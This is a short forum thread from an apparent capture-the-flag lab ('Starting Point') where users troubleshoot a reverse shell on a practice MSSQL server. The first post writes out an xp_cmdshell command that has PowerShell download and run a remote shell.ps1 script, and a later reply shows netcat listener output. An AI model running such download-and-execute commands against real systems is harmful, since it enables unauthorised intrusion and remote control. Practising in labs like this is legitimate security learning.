Starting Point - Upload shell.ps1 stuck

Hi all:

In starting point, i set up a web server, create shell.ps1 file and listen on 443, i do SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.198/shell.ps1\“);” and http server show the GET. but the mssqlclient stay stuck, no activity at all.

What i should look now? not firewall at all.

Thanks in advance!

Ok, fixed!

i am experiencing the same issue.

Type your comment> @azlelor said:

Ok, fixed!

@azlelor Would you be able to update on how you fixed this? I’m stuck with nc saying:

listening on [any] 443
connect to [10.10.14.182] from (UNKNOWN) [10.10.10.27] 49998

SQL client hangs, and the reverse shell doesn’t seem to open up despite the connection seeming to be made

Any help would be appreciated, thanks!

I found it out too, turns out it was connecting but not showing output in nc